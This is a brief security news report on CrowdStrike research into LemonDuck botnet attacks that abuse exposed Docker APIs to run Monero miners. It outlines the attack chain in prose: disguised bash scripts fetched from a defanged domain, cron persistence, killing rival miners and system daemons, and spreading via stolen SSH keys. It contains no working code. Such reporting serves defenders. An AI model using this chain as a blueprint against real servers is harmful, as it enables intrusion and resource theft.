The security researchers from CrowdStrike have released a whitepaper regarding the ongoing attacks on Docker API on Linux servers. The threat actors are utilizing the LemonDuck botnet to initiate the mining operations for Monero cryptocurrency. For initial compromise, the attackers are looking for exposed Docker API.
Exposed Docker API is the key
Docker is a platform for building, running, and managing containerized workloads, and it provides APIs for setting up automation. It is generally used to run container workloads in the cloud. Misconfiguration of cloud instances might result in exposed Docker APIs, which LemonDuck operators are currently looking for. Those APIs allow the threat actors to run mining malware inside the target container. Additionally, the attackers might be able to escape from the container as well, by abusing privileges and other misconfigurations on the cloud.
All of the competing mining groups’ processes are killed for maximizing LemonDuck’s mining efficiency
After the initial access by utilizing Docker API, attackers run a malicious container to download the core.png file, which is actually a disguised Bash script. The file is downloaded from t.m7n0y[.]com domain which LemonDuck utilized in its previous campaigns. The core.png bash file prepares a Linux cronjob inside the container to download another file, a.asp, which is also a Bash script. a.asp script follows the steps below, alongside disabling the Alibaba Cloud monitoring service that provides security.
- Kills the number of processes based on names of known mining pools, rival crypto mining groups, etc.
- Daemons like crond, sshd, and syslog are killed by grabbing daemon process IDs.
- The known IOC file paths of competing crypto mining groups are deleted to disrupt any existing operation.
- Connections that are ESTABLISHED or in progress (SYN_SENT) to known C2 of competing crypto mining groups are killed.
After cleaning up the processes and connections of other crypto miner groups, the a.asp file downloads the XMRig file to start mining. It uses a proxy pool to hide the crypto wallet addresses. Then, LemonDuck looks for SSH keys on the file system to log in and spread.
Hiding the Docker APIs properly on cloud instances is currently the only solution for avoiding LemonDuck crypto-mining attacks.